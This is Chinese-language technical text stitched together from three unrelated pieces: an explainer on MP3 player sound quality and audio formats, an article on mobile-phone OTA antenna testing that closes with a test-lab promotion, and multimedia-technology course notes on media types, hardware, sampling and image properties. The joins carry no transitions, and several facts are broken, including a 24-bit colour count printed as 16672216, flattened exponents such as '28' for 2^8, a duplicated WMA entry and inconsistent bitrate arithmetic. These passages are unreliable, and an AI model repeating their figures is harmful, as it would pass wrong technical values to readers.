对于音质，如果元件选择不当对于音质的影响一般来说都是细微的，特别是对于这种数码产品，会影响音质的，其实也就是最后的那一小段模拟电路，而之前的大部分电路都不会对音质产生影响。 
说了这么多，那到底谁才是决定MP3音质的关键呢？这个真的不好回答，因为一台优秀的MP3随身听需要各部分完美的结合才行，在这些因素中只要有一项做的不好，都会对音质产生明显的影响，因此它们并不能用简单的百分比来表示。所以要衡量MP3随身听的音质，除了分析它的主芯片构成外，还要多听才行，非发烧友级的普通消费者，也只能作出比较主观的判断和选择了。
（六）MP3和WMA音频格式相关知识
数字音频格式即以数字形式进行记录、处理和播放的音频信号。数字音频格式的出现，是为了满足高保真复制、存储、传输的需求。简单的说，早期的模拟音频格式，存在着复制失真和因为介质磨损而失效的问题。从CD盘的问世开始，数字格式音频文件开始普及，但又产生了一个问题——存储体积上的限制，同时CD盘仍然存在磨损的现象。如果保存到硬盘上（相对存储时间更长），在当时存储介质（主要是硬盘）仍然昂贵的情况下，也不是好的解决方法。而互联网的出现，更产生了远距离传输文件的要求，在带宽的制约下，缩小文件体积的需求变得更加强烈，这些都从外部因素上导致了有损压缩数字音频格式产生！
而从内部因素来说，随着电脑运算、编码能力的提高，各种声学心理模式的进步，促进了各种有损压缩数字音频格式的层出不穷。以下简要介绍一些在MP3随身听上广泛使用的音频格式——MP3（CBR、VBR、ABR）、WMA、WAV、ADPCM，以及新兴的音频格式AAC、ASF和OGG。
在介绍几种数字音频格式之前，我们先来明晰一个概念——Bit Rate（比特率）。
在计算机领域中，所有的资料都是被数字化的，比特（Bit）是电脑中最小的数据单位，指一个0或者1的数，也就是数学上的二进制数字，一个“0”或“1”，就是一个位。例如当我们说一个2位的数字，就是指它是一个两位数的二进制数字，有“00”、“01”、“10”、“11”这4种组合，分别代表十进制中的0、1、2、3四个数字。
比特率是一种数字音乐压缩效率的参考性指标，比特率表示单位时间（1秒）内传送的比特数bps（bit per second，位/秒），通常我们使用kbps（通俗地讲就是每秒钟1000比特）作为单位。CD中的数字音乐比特率为1411.2kbps（也就是记录1秒钟的CD音乐，需要1411.2×1024比特的数据）。音乐文件的比特率越高，意味着在单位时间（1秒）内需要处理的数据量（Bit）越多，也就表明音乐文件的音质越好。但是，比特率高时文件大小变大，会占据很多的存储容量，MP3音乐文件最常用的bit rate是128kbps，MP3文件可以使用的比特率一般是8～320kbps。 
1、 WMA（Windows Media Audio，视窗媒体音频）
作为微软公司的多媒体压缩方式，它是在Windows Media Technologies中只压缩音频数据的那一部分技术，音质类似MP3，能以MP3一半的技术完成压缩。它具有版权所有的Windows Media Rights Manager，可通过安装在WMP（Windows Media Player，视窗媒体播放器）进行播放。由于微软和Windows的强大影响力，以及最重要的版权原因，美国的主要唱片公司EMI和BMG公司等正式确定使用由微软公司开发生产的WMA方式。相信，今后这种先进方式会得到进一步的普及。
2、 MP3（CBR、VBR、ABR）
MP3是目前使用用户最多、应用最为广泛的有损压缩数字音频格式，在前文已经做过解释，在此不再复述。
CBR（Constant Bit Rate，固定比特率） 
CBR是最古老最简单的MP3编码（压缩）方式。采用此法编码时，整个文件的比特率都是一样的，换言之，MP3文件每秒使用的比特率都是一样。尽管音乐文件有复杂程度不同的段落，编码器始终把比特率保持一致，除非你用最高音质，否则，MP3文件中不同段落的音质会有变化。越是复杂的段落，其音质就越差。它的最大优点是文件的尺寸固定，便于计算存储的空间。
VBR（Variable Bit Rate，可变比特率） 
VBR是一种可变编码速率的MP3压缩方式，其原理就是将一首歌的复杂部分用高比特率编码，简单部分用低比特率编码，通过这种动态调整编码速率的方式，进一步得到音质和文件体积之间的平衡。它的主要优点是可以让整首歌都能大致达到我们的音质要求，缺点是编码时无法估计压缩出来的文件体积大小。 
现在推出的MP3随身听大部分都支持VBR了，不过有些机器虽然能够播放VBR格式的歌曲，但是不能够正确显示播放时间，目前许多高品质的MP3音乐都是采用VBR编码的。
ABR（Average Bit Rate，平均比特率） 
ABR是VBR的一种插值参数，它是在VBR的基础上发展出来的一种编码方式，是针对CBR较大的文件体积和VBR生成文件体积大小不定的特点创造了这种编码模式。ABR在指定的文件大小内，以每50帧（30帧约1秒）为一段，低频和不敏感频率使用相对低的流量，高频和大动态表现时使用高流量，可以作为VBR和CBR的一种折中选择。
3、 WMA（Windows Media Audio，视窗媒体音频） 
WMA是微软公司的多媒体压缩方式，它是在微软视窗媒体技术中只压缩音频数据的技术，音质类似MP3。从压缩比角度来说，在低于192kbps的编码速率条件下，WMA可以在同样音质条件下获得比MP3文件更小的体积——甚至一半（但当编码速率高于192kbps时，普遍的反映是MP3的音质要好于WMA）。微软官方宣布的资料中称WMA格式的可保护性极强，甚至可以限定播放机器、播放时间及播放次数，具有相当的版权保护能力。
4、 WAV（声音资源文件）
WAV是一种波形文件，直接记录声音的波形，未被压缩，从CD抓取的音轨就是wav文件，体积大。
5、 ADPCM
ADPCM是Adaptive Differential Pulse Code Modulation的缩写，全名为自适应差分脉冲编码，也是一种有损压缩数字音频格式。这个格式常用在MP3随身听的录音方面，它可以提供极高的压缩比，一般128MB的MP3随身听最长可以记录16小时的录音，但追求录音时间过长是以牺牲音质为代价的。
6、 AAC（Advanced Audio Coding，高级音频编码）
AAC是由Fraunhofer研究院（MP3格式的创造者）、杜比（DOLBY）试验室和AT&T（美国电话电报公司）共同研发出的一种有损压缩音频格式，是MPEG-2规范的一部分。与MP3相比，AAC增加了对立体声的完美再现、码流效果音扫描、多媒体控制、降噪优化等MP3音频格式所没有的特性，同时还支持更多种采样率和比特率、多种语言的兼容能力、更高的解码效率。总之，AAC可以在比MP3文件缩小30％的前提下提供更好的音质。
不过，在目前的MP3随身听上，仅有少数几家应用了这一格式。
7、 ASF（Advanced Streaming Format，高级流动格式）
ASF是微软公司针对Real公司开发的新一代网上流式数字音频压缩技术。这种压缩技术的特点是同时兼顾了保真度和网络传输需求，所以具有一定的先进性。也是由于微软的影响力，这种音频格式现在正获得越来越多的支持。
8、 OGG Vorbis格式
OGG是一个庞大的多媒体开发计划的项目名称，涉及视频音频等方面的编码开发。OGG Vorbis是高质量的音频编码方案，它比MP3先进在于可以支持多声道编码。官方数据显示，OGG Vorbis可以在相对较低的数据速率下实现比MP3更好的音质。但由于随身听使用耳机播放的局限，即便是经过多声道（两声道以上）编码的OGG Vorbis格式音频文件，用耳机收听也感受不到环绕效果，因为耳机只提供双声道输出。

　　1.OTA 测试介绍
　　1.1 手机的无源测试和有源测试
　　当前在手机射频性能测试中越来越关注整机辐射性能的测试，这种辐射性能反映了手机的最终发射和接收性能。目前主要有两种方法对手机的辐射性能进行考察：一种是从天线的辐射性能进行判定，是目前较为传统的天线测试方法，称为无源测试；另一种是在特定微波暗室内，测试手机的辐射功率和接收灵敏度，称为有源测试。OTA(Over The Air)测试就属于有源测试。
　　无源测试侧重从手机天线的增益、效率、方向图等天线的辐射参数方面考察手机的辐射性能。无源测试虽然考虑了整机环境(比如天线周围器件、开盖和闭盖)对天线性能的影响，但天线与整机配合之后最终的辐射发射功率和接收灵敏度如何，从无源测试数据无法直接得知，测试数据不是很直观。
　　有源测试则侧重从手机整机的发射功率和接收灵敏度方面考察手机的辐射性能。有源测试是在特定的微波暗室中测试整机在三维空间各个方向的发射功率和接收灵敏度，更能直接地反映手机整机的辐射性能。
　　CTIA(Cellular Telecommunication and Internet Association)制定了OTA(Over The Air)的相关标准。OTA 测试着重进行整机辐射性能方面的测试，并逐渐成为手机厂商重视和认可的测试项目。
　　1.2 OTA 测试的目的
　　目前只有通过FTA(Full Type Approval)认证测试的手机型号才能上市销售，在FTA 测试中，射频性能测试主要进行手机在电缆连接模式下的射频性能测试；至于手机整机的辐射发射和接收性能，在FTA 测试中没有明确的规定,而OTA 测试正好弥补FTA 测试在这方面测试的不足。同时，终端生产厂家必须对所生产手机的辐射性能有清楚的了解，并通过各种措施提高手机辐射的发射和接收指标。如果手机辐射性能不好，将产生手机信号不好、语音通话质量差、容易掉线等多方面的问题，这也是客户投诉比较多的问题。
　　在手机通话时，由于人脑靠近手机天线，将降低手机的发射和接收性能，手机整机辐射的发射和接收性能都会降低。在手机研发过程中应定量测量人脑对手机的发射和接收性能的影响，进行优化设计，使发射和接收性能降低不能太大，即减少人体和天线的电磁耦合效应。
　　为考察手机的辐射性能，除考察手机天线的无源性能之外，整机的有源性能也是一个重要的考察方面。当前整机有源性能越来越受到终端厂商的重视，因此在手机辐射性能的考察中应将两种辐射性能综合起来考虑。目前终端天线厂商在研发中一般都要求天线供应商提供无源和有源测试报告。
　　2.OTA 测试及手机其他的主要参数
　　2.1 OTA 测试中的主要测试参数及相关计算在OTA 测试中，辐射性能参数主要分为两类：接收参数和发射参数。
　　发射参数有TRP、NHPRP；接收参数有TIS、NHPIS。
　　TRP(Total Radiated Power)：通过对整个辐射球面的发射功率进行面积分并取平均得到。它反映手机整机的发射功率情况，跟手机在传导情况下的发射功率和天线辐射性能有关。
　　NHPRP(Near Horizon Partial Radiated Power)：反映在手机的H面附近天线的发射功率情况的参数。
　　TIS(Total Isotropic Sensitivity)：反映在整个辐射球面手机接收灵敏度指标的情况。它反映了手机整机的接收灵敏度情况，跟手机的传导灵敏度和天线的辐射性能有关。
　　NHPIS(Near Horizon Partial Isotropic Sensitivity)：反映手机在H面附近天线的接收灵敏度情况的参数。
　　对于手持终端，OTA 测试中还将考察终端在有模拟人头情况下的上述参数，比较在有无模拟人头情况下相关参数的变化情况。
　　2.2 其他有关的天线参数
　　在考察天线性能的时候，还有其他需要了解的参数如：APIP、Gain、Directivity、EIRP、ERP。
　　Gain(dBi)：在相同的输入功率下，天线在空间某点的辐射功率与理想无方向性点源天线在同一点的功率的比值，该增益单位为dBi，手机天线厂家提供的天线测试报告中的增益一般以dBi 为单位。
　　Gain(dBd)：在相同的输入功率下，天线在空间某点的辐射功率与理想半波偶极子天线最大辐射方向上功率的比值，该增益的单位为dBd。
　　Directivity：在相同的辐射功率下，某天线在空间某点产生的功率与理想无方向点源天线在同一点产生的功率的比值。
　　Efficiency：天线辐射功率和天线输入功率的比值。
　　APIP(Antenna Port Input Power)：加入到天线口的功率大小，是PA 输出到天线口的功率大小。该功率大小主要跟手机的传导发射功率大小有关。
　　EIRP(Effective Isotropic Radiated Power)：等效全向辐射功率是天线得到的功率与天线以dBi 表示的增益的乘积，反映天线在各个方向上辐射的功率的大小。
　　PEIRP(Peak Effective Isotropic Radiated Power)：峰值等效全向辐射功率。
　　ERP(Effective Radiated Power)的概念与EIRP 相同，但ERP 是天线得到的功率与以dBd 表示的增益的乘积。
　　3.OTA 测试中的TRP 和SAR 指标的制约关系
　　TRP 反映的是天线远场的辐射性能，而SAR 反映是天线的近场辐射性能。对于OTA 中的TRP 指标，一般是希望其TRP 比较大，这样从PA 出来进入天线的功率才被有效辐射，无线接口的连接性才比较好。在SAR 测试中，则希望TRP 数值比较小，这样被人脑吸收的功率才比较小，保证能通过SAR 测试标准。因此，TRP 指标与SAR 指标是一对相互矛盾的指标，在天线设计中如何保证两个指标都达到相关的标准，满足设计需要，在天线设计的之初就得考虑。
　　以下是一些解决措施：
　　(1)选用合适的天线形式，最为重要。比如内置天线中的Monopole 具有效率高但SAR 也高的特点，因此在使用之前就应该对此有所认识，即Monopole 和人脑的耦合效应较强。PIFA 天线综合性能较好，由于其靠近人脑的一侧被PCB 的地遮挡，其高频频段在人脑方向比最大辐射方向有5-6dB的衰减，因此PIFA 天线的SAR 值比较低，是内置天线中比较理想的天线形式。
　　(2)在天线的设计之初就考虑SAR 问题，主要在结构问题上进行设计，结合手机的结构选用合适形式的天线，保证天线性能的同时还满足通过SAR 指标，比如采取将天线放置于PCB 的底部等措施。对于外置式的螺旋天线一般应注意天线与人脑之间的距离，保证满足SAR 测试的需要。
　　(3)在设计后期发现SAR 测试超标，可通过调低天线性能的方式解决，如使用损耗稍大的材料等方法，这需要与天线厂家配合进行。
　　(4)更改天线走线方式，调整方向图等措施。
　　(5)在标准允许的情况下，降低PA 的输出功率。
　　以上方法是在满足SAR 和TRP 测试需要的情况下，取得两者的折中。
　　4.总结
　　CTIA 的OTA 测试指标直接反映了手机的辐射性能，因此越来越受到测试机构和相关厂商的重视。在手机天线指标判定时，需要将无源和有源性能指标综合考虑，对整机天线性能进行综合评价。
　　MORAB的OTA天线测试暗室符合CTIA的OTA测试标准，测试系统采用的SG24的近场折算远场测量方案，是目前最准确的天线测试方法。有重复性高，准确度高，解析度高等优点。SG24 是全球少数能完全符合CTIA 要求的测试系统。能提供CTIA 所需要的TRP/TIS 测试。测试适用范围:CTIA OTA (GSM900,DCS1800,Cellular 850,PCS1900)；3D 天线场型测量、增益、天线效率、方向图、极化性能。
　　×××××××××××××××××××××××××××××××××××××××××××××××××××××
　　相关标准：
　　移动台空中射频辐射功率和接收机性能测试方法 YD 1484-2006-I
　　Test Plan for Mobile Station Over the Air Performance 2.2.1
　　国内CTA认证新加入了TRP的测试要求

多媒体应用技术
(一) 教学目的:掌握多媒体概念和相关技术,熟练媒体素材的采集和合成.
(二) 教学内容:多媒体概念和媒体种类,多媒体计算机系统组成,多媒体相关技术,媒体素材的采集和合成;
基本要求:熟练掌握多媒体概念和常见媒体素材的运用.
(三) 教学建议:采用理论和实践相结合的教学方式:
(1)课堂上播放媒体激发学生的学习热情;
(2)采用实验的形式让学生掌握媒体的采集和合成
4.1 多媒体技术概念
4.1.1 多媒体的基本概念
一,媒体的概念及分类
"多媒体"一词译自英文"Multimedia"即"Multiple"和"Media"的合成,其核心词是媒体
媒体(medium)在计算机领域有两种含义:即媒质和媒介.
媒质:存储信息的实体,如磁盘,光盘, 磁带, 半导体存储器等.
媒介:传递信息的载体,如数字,文字,声音,图形和图像等.
通常概念的"媒体" ,可分为以下五种类型:
1.感觉媒体:能直接作用于人们的感觉器官,从而能使人产生直接感觉的媒体.如语音,音乐,各种图像,动画,文本等.
2.表示媒体:为了加工,处理和传输感觉媒体而人为研究和构造出来的中间媒体.包括各种编码方式.如图形文件,声音文件等.
3.显示媒体:用于通信中使电信号和感觉媒体之间产生转换的输入/输出设备.如键盘,鼠标,显示器,麦克风,扫描仪,打印机等.
4.传输媒体:表示媒体从一处传输到另一处的物理载体,如电话线,电缆光纤等.
5.存储媒体:用于存放表示媒体的存储介质.如纸张,磁带,磁盘,光盘等.
二,计算机技术及其特性
多媒体计算机技术的定义:计算机综合处理多种媒体信息,如文本,图形,图像,音频,视频和动画等,使多种媒体信息建立逻辑连接,集成为一个具有交互性的系统的一体化技术.
多媒体计算机技术的三个主要特性;信息载体的多样性,交互性,集成性
信息载体的多样性是相对于传统计算机而言的,即指信息载体的多样性.
集成性是指以计算机为中心综合处理多种信息媒体,它包括媒体信息的集成和处理这些媒体的设备或工具的集成.
交互性是指用户可以与计算机的多种信息媒体进行交互操作从而为用户提供了更加有效地控制和使用信息的手段.
体中的媒体元素及特征
多媒体媒体元素是指多媒体应用中可显示给用户的媒体成分,主要包括文本,动画,图形,图像,视频以及音频.
1.文本指各种文字,包括各种字体 ,尺寸,格式及色彩的文本.文本数据可以使用文本编辑软件(Word,WPS等)制作,应用于多媒体系统中可以使显示的信息更易于理解,是多媒体应用系统的基础.
2.图形(Graphic)一般指用计算机绘制的画面,如直线,圆,圆弧,矩形,任意曲线和图表等.图形的格式是一组描述点,线,面等几何元素特征(如图形的大小,形状及其位置,颜色)的指令集合.在图形文件中只记录生成图的算法和图形上的某些特征点,因此也称矢量图.用于产生和编辑矢量图形的程序通常称为" draw "程序.
3.图像(Image)是指由输入设备捕捉的实际场景画面,或以数字化形式存储的任意画面.
也称为位图,是由一组象素点构成的矩阵,每个象素点记录图像的颜色和亮度.用于生成和编辑位图图像的软件通常称为" paint " 程序.
由于图形只保存算法和特征点,因此占用的存储空间很小.但显示时需经过重新计算,因而显示速度相对慢些.
图形和图像的不同点:P190
4.音频是声音的信息,是基于时间实时变化的信息,通常用一种模拟的连续的波形表示.常见的音频有:波形音频(WAV),乐器数字接口(MIDI)音频,光盘数字音频(CD-DA).
5.视频是一组静态图像的连续播放,组成视频的静态图像内容上和播放时间都是连续的.
6.动画是活动的画面,借助计算机生成的一系列连续运动的画面,有造型动画和帧动画.
视频和动画的画面来源不同:动画的图形图像由计算机绘制组成;视频的画面来自于真实的视频源(录像机,摄影机等).
4.1.2 多媒体的基本技术
一,音频,视频信号数字化处理技术

二,音频,视频数据压缩/解压缩技术
数字化后的音频和视频信号数据量仍很大,需要使用压缩技术.选用合适的数据压缩技术,可以使文本数据压缩到原来的1/2左右,音频数据压缩到原来的1/2-1/10,图像数据压缩到原来的1/2-1/60.多媒体数据压缩可以分为
a.无损压缩:去掉或减少数据中冗余信息,不失真 压缩比较低,如:Huffman编码,算术编码
b.有损压缩:压缩了信息熵,损失的信息无法恢复 . 压缩比较高,如:预测编码,变换编码
衡量压缩技术好坏的3个重要指标:
(1)压缩比(2)压缩算法(3)恢复效果
三,多媒体专用芯片技术
进行音频,视频信号的压缩,解压缩处理,实现图像的特殊效果处理,图像的绘制和生成等,需要大量的快速计算,只有采用专用芯片,才能取得满意的效果.
多媒体计算机专用芯片可归纳为两种类型:一种是固定功能的芯片;另一种是可编程的数字信号处理器(DSP芯片).
四,大容量光存储技术
每张光盘存储650MB数据,DVD盘片存储可达17G.
五,媒体输入/输出技术
多媒体输入/输出技术包括媒体变换技术,媒体识别技术,媒体理解技术和综合技术.
六,多媒体软件技术
包括多媒体操作系统技术,多媒体素材采集与制作技术,多媒体编辑与创作技术,多媒体应用程序开发技术等
七,多媒体通信技术
包括语音,图像,视频信号的实时压缩及多媒体混合传输技术
八,超文本与超媒体技术
超文本是一种交互式的文本信息管理技术,以节点作为表达信息的一个单位,节点与节点间通过"链"建立各种媒体信息间的网状连接. 若超文本中的节点的数据不仅可以是文本,
还可以是图像,动画,音频,视频,则称为超媒体. 一般把已经组织成网状的信息称为超文本(超媒体),而对其进行管理使用的系统称为超文本(超媒体)系统.导航技术是超媒体技术中的重要组成之一.
4.1.3 多媒体技术的应用与发展
一.多媒体技术的应用
多媒体技术几乎涵盖了计算机应用的绝大多数领域,而且开拓了涉及人类生活,娱乐/学习等方面的新领域.
(1).教育与培训
(2).信息咨询
(3).网络通信
(4).电子出版物
(5).家庭娱乐
1.在教育与培训方面的应用:
多媒体技术使教材不仅有文字,静态图像,还具有动态图像和语音等.使教育的表现形式多样化,可以进行交互式远程教学.利用多媒体计算机的文本,图形,视频,音频和其交互式的特点,可以编制出计算机辅助教学 CAI( Computer Assisted Instruction )软件,即课件.
在网络通信方面的应用
2.多媒体技术在网络通信方面的应用主要有:
可视电话
视频会议
信息点播(VOD)
网上购物
远程教育'
计算机协同工作 CSCW(Computer Supported Cooperative Work)
二.多媒体技术的发展
目前,多媒体主要从以下几个方向发展:
1)多媒体通信网络环境的研究和建立将使多媒体从单机单点向分布,协同多媒体环境发展,在世界范围内建立一个可全球自由交互的通信网.对该网络及其设备的研究和网上分
布应用与信息服务研究将是热点.
2) 利用图像理解,语音识别,全文检索等技术,研究多媒体基于内容的处理,开发能进行基于内容的处理系统是多媒体信息管理的重要方向.
3) 多媒体标准仍是研究的重点:各类标准的研究将有利于产品规范化,应用更方便.它是实现多媒体信息交换和大规模产业化的关键所在.
4) 多媒体技术与相邻技术相结合,提供了完善的人机交互环境.多媒体仿真智能多媒体等新技术层出不穷,扩大了原有技术领域的内涵,并创造新的概念.
5) 多媒体技术与外围技术构造的虚拟现实研究仍在继续进展.多媒体虚拟现实与可视化技术需要相互补充,并与语音,图像识别,智能接口等技术相结合,建立高层次虚拟现实系统.
总之,将来多媒体技术将向着以下六个方向发展;
1).高分辨化,提高显示质量;
2).高速度化,缩短处理时间;
3).简单化,便于操作;
4).高维化,三维,四维或更高维;
5).智能化,提高信息识别能力;
6).标准化,便于信息交换和资源共享.
4.2 多媒体计算机系统组成
一,多媒体计算机系统组成结构如下图所示.
多媒体应用系统
第七层
软件系统
多媒体创作,编辑软件
第六层
多媒体素材处理软件
第五层
多媒体系统软件
(操作系统,驱动软件等)
第四层
多媒体输入/输出控制卡及接口
第三层
硬件系统
多媒体计算机硬件
第二层
多媒体外围设备
第一层
二,多媒体硬件系统
多媒体硬件系统是由计算机传统硬件设备,光盘存储(CD-ROM),音频输入/输出和处理设备,视频输入/输出和处理设备等选择性组合而成,其基本框图如下图所示:

1.声卡
声卡是处理和播放多媒体声音的关键部件,它通过插入主板扩展槽中与主机相连.卡上的输入/输出接口可以与相应的输入/输出设备相连.常见的输入设备包括麦克风,收录机和电子乐器等,常见的输出设备包括扬声器和音响设备等.
声卡一般由Wave合成器,MIDI合成器,混合器,MIDI电路接口,CD-ROM接口,DSP数字信号处理器等组成.
声卡的基本功能:
(1). 录制,播放,编辑,合成波形音频文件.
(2). 录制和合成MIDI音乐.
(3). 接收来自CD-ROM的声音信号.
用声卡录制和播放波形音频的工作过程:
(1).将声音的输入/输出设备连接到声卡.
(2). 使用Windows的录音程序录制声音.录音时,从音频输入设备输入声音,通过声卡进行模/数转换,再由声卡中的DSP数字信号处理器进行压缩后,以文件形式存储在计算机中.
(3). 播放数字化音频时,通过声卡对数字音频文件进行解压缩,数/模转换后由输出设备输出.
声卡与其他设备的连接如下图:
2.视频卡
视频卡是对模拟视频进行捕捉并转换为数字视频的部件,其基本功能是:
(1)从动态模拟视频中实时或非实时捕捉图像,转换为数字信号并存储.
(2)在显示器上以不同的窗口大小显示视频图像.
(3)提供许多视频图像的特殊处理效果,如冻结,淡出,旋转等.
(4)一些视频卡还提供了硬件压缩功能.
视频采集卡的结构如下图所示.
3.光盘存储器
1).CD-ROM盘的结构和读写原理
光盘存储器由CD-ROM驱动器和光盘片组成.光盘片采用磁光材料,数据存放在光盘片中连续的螺旋形轨道上.当在光盘上写数据时,光盘驱动器的光学头发出的激光束聚焦在光盘轨道上,改变轨道上的某种性质(如反射率,反射光极化方向等),这些变化的性质对应于二进制数0和1,当读取光盘上的数据时,光盘驱动器的光学头发出的激光束照射在光盘轨道上,光电检测器检测出光强和光极性的变化,从而读出存储在光盘上的数据.
2)CD-ROM驱动器前面板的功能介绍
打开/关闭/停止按钮用来打开/关闭CD-ROM驱动器的托盘,
托盘是为放光盘设计的.
③读盘忙标志指示灯亮时,表示驱动器正在读盘.
④通过耳机插口插入耳机可以直接收听CD唱盘的音频信息.
⑤耳机音量旋钮可以调节耳机的音量大小.
⑥播放选择按钮用来对CD唱盘的播放和节目选择进行控制.
3)光盘存储器的分类
(1)CD-ROM (Compact Disc-Read Only Memory)
只读型光盘存储器
(2)可读写型光盘存储器,俗称"刻录机"
CD-R( Compact Disc-Recordable)
一次写入,多次读取
CD-RW (Compact Disc-Rewriteable)
多次写入,多次读取
(3)DVD-ROM
DVD(Digital Versatile Disc)数字通用光盘
(Digital Video Disc)数字影像光盘
(4)COMBO 俗称"康宝"
整合了CD-RW 和DVD-ROM的功能
(5)DVD刻录机
支持CD-R, CD-RW , DVD-R, DVD-RW
4)CD-ROM光盘系统的主要技术指标
衡量一个光盘系统特性的主要技术指标包括存储容量,平均存取时间,数据传率,接口标准等.
5)CD-R和CD-RW刻录机的主要技术指标
除了上面的指标外,还有刻录机速度,缓存区容量,使用寿命等.
4.多媒体辅助设备
1.扫描仪
扫描仪是一种静态图像输入设备,利用光电转换原理,通过扫描仪光电管的移动或原稿的移动,把黑白或彩色的原稿信息数字化后输入到计算机中,它还用于文字识别,图像识别等新的领域.
(1)扫描方式分类:手动式,平板式,胶片式和滚筒式.
(2)扫描仪由CCD(Charge Coupled Device,电荷耦合器件阵列),光源及聚焦透镜组成.
(3)描述扫描仪的技术指标,主要包括
分辨率:用每英寸象素数表示;分辨率越高,图像越清晰
色彩位数:每个象素使用的二进制位数;色彩位数越多,表达色彩就越丰富
接口类型: USB通用串行总线接口,SCSI接口, EPP增强型并行接口.
2.数码相机
数码相机是一种图像输入设备,外观和使用方法上与普通的全自动照相机很相似,两者之间最大的区别在于前者使用电荷耦合器作为成像部分,在存储器中储存图像数据,后者通过胶片曝光来保存图像.
数码相机的主要技术指标是 像素数,存储能力,接口标准.像素数即CCD( Charge Coupled Device,电荷耦合器件)CCD芯片上光敏元件数量,决定了数码相机的成像质量,像素数越高则成像质量越好.高像素数码相机尽可能采用高容量的存储介质.现在相机一般具有扩充能力,可以安装扩展存储卡,以提高相机的存储能力.
3.触摸屏
触摸屏是一种用触摸屏幕代替鼠标和键盘操作的输入设备,触摸屏一般包括控制卡,检测装置和驱动程序三个部分.
触摸屏按工作原理分为:
(1)红外线触摸屏
(2)电阻式触摸屏
(3)电容式触摸屏
(4)表面声波触摸屏
(5)进场成像触摸屏
4.手写笔
手写笔主要用来输入中文,需要专门的手写识别软件,同时手写笔还既有鼠标的作用.
手写笔由与电脑相连的写字板和在写字板上写字的笔组成.手写笔分为电阻式和感应式两种
5.多媒体个人计算机
多媒体个人计算机(Multimedia Personal Computer,简称MPC),是指具有多媒体功能的个人计算机.它是在PC基础上增加一些硬件板卡及相应软件,使其具有综合处理文字,声音,图像视频等多种媒体信息的功能.
MPC主要特征可以用一个简单的公式表示:
多媒体PC机 = PC机 + CD-ROM驱动器 + 声卡
MPC标准由Microsoft,IBM等公司组MPC市场联盟制定,随着多媒体计算机技术的发展,MPC标准也在不断提升
4.3 媒体素材的采集和制作
一,多媒体素材的文件格式
二,音频素材的采集与制作
1.音频数字化过程
声音是由空气中分子的振动而产生的.自然界的声音是一个随时间而变化的连续信号,可近似地看成是一种周期性的函数.通常用模拟的连续波形描述声波的形状,单一频率的声波可用一条正弦波表示,如下图所示.
(1)采样和量化
数字化音频的过程如下图所示:
模拟音频信号
音频信号的采样
采样信号的量化
模拟声音在时间上是连续的,或称连续时间函数x(t).用计算机处理这些信号时,必须先对连续信号采样,即按一定的时间间隔(T)在模拟声波上截取一个振幅值(通常为反映某一瞬间声波幅度的电压值),得到离散信号x(nT) (n为整数).T称采样周期,1/T称为采样频率.为了把采样得到的离散序列信号x(nT)存入计算机,必须将采样值量化成有限个幅度值的集合x(nT),采样值用二进制数字表示的过程称为量化编码.
(2). 影响数字音频质量的技术参数
对模拟音频信号进行采样量化编码后,得到数字音频.数字音频的质量取决于采样频率,量化位数和声道数三个因素.
1). 采样频率
采样频率是指一秒钟时间内采样的次数.
在计算机多媒体音频处理中,采样频率通常采用三种:11.025KHz(语音效果),22.05KHz(音乐效果),44.1KHz(高保真效果).常见的CD唱盘的采样频率即为44.1KHz.
2). 量化位数
量化位数也称"量化精度",是描述每个采样点样值的二进制位数.例如,8位量化位数表示每个采样值可以用28即256个不同的量化值之一来表示,而16位量化位数表示每个采样值可以用216即65536个不同的量化值之一来表示.常用的量化位数为8位,12位,16位.
3). 声道数
声音通道的个数称为声道数,是指一次采样所记录产生的声音波形个数.记录声音时,如果每次生成一个声波数据,称为单声道;每次生成两个声波数据,称为双声道(立体声).随着声道数的增加,所占用的存储容量也成倍增加.
(3). 数字音频文件的存储量
以字节为单位,模拟波形声音被数字化后音频文件的存储量(假定未经压缩)为:
存储量=采样频率×量化位数/8×声道数×时间
例如,用44.1KHz的采样频率进行采样,量化位数选用16位,则录制1秒的立体声节目,其波形文件所需的存储量为:
44100×16/8×2×1=176400(字节)
2 . MIDI音频
MIDI(Musical Instrument Digital Interface)是乐器数字接口的缩写.MIDI是一种数字音频的国际标准,是计算机和MIDI设备之间进行信息交换的通信协议.
MIDI音频是将电子乐器键盘上的弹奏信息记录下来,包括键名,力度,时值长短等,存储成扩展名为.mid的文件.当需要播放时,只需从相应的MIDI文件中读出MIDI消息,生成所需要的声音波形,经放大后由扬声器输出.
由于MIDI文件只是一系列指令的集合,因此它比数字波形文件小得多,大大节省了存储空间.
MIDI声音适于重现打击乐或一些电子乐器的声音,利用MIDI声音方式可用计算机来进行作曲.
3.音频素材的采集和制作 P203~204
4.音频素材的获取途径:
通过计算机中的声卡,从麦克风中采集语音生成 .WAV文件.
利用专门的软件抓取CD或VCD中的音乐,再利用声音编辑软件
对其进行剪辑,合成等加工处理;常用的编辑软件有Cool Edit,Sound Edit等.
从素材光盘提供的声音素材中选取.
从网络上下载各种格式的声音文件.
从MIDI电子乐器或MIDI键盘中采集和创作音乐并生成MIDI文件.
其中,通过计算机声卡和麦克风等声音采集设备,利用Windows的"录音机"程序录制和编辑数字波形的方法操作步骤:
连接设备.
设置录音参数,如录音通道的选择,音量的设置的等.
设置声音属性,如录制的声音的采样频率,量化位数,声道 数,编码方式等.
录制声音.
保存声音,注意文件的格式.
编辑,加工处理录制的声音,如声音的剪辑,混合等.
三,图象素材的采集与制作
1.图象数字化过程
图象信号是基于空间的连续模拟信号,而计算机只能处理数字信号,因此需要对模拟图象信号进行数字化处理.与音频信号一样,图象的数字化过程也需要经过采样和量化两个步骤.
(1)采样
(2)量化
2.图象基本属性
描述一幅图像的三个基本属性:分辨率,图像深度,图像文件大小
(1)分辨率
与图象有关的分辨率包括显示分辨率和图象分辨率.
显示分辨率:显示器屏幕上能够显示出的像素数目,决定图像显示区域大小
图像分辨率:一幅图像的像素数目,即该图像 的水平与垂直方向的像素个数;决定图像的质量
图像分辨率与显示分辨率的关系 P207
(2)图像深度
图像深度:指图像中每个像素所占的二进制数字位数,即图像的量化精度
颜色深度
颜色总数
图像名称
1
2
单色图像
4
16
索引16 色图像
8
256
索引256 色图像
16
65536
HI—Color 图像
24
16672216
True Color 图像
(3)图像文件大小
图像的分辨率越高,图像深度越大,图像的质量越好,但图像的存储容量也越大.用字节表示图像文件大小时,一幅未经压缩的数字图像的数据量大小计算如下:
存储容量 = 图像高×图像宽×图像深度÷8
例如:一幅 640×480 的 256 色图像为
640×480×8/8 = 307200 字节
3.图像素材的采集与制作
(1)图像素材的获取途径:
利用软件创作,常用的有Photoshop,Illustrator,CoreDRAW等;
通过扫描仪扫描,可以将图片实物转换成数字图像;
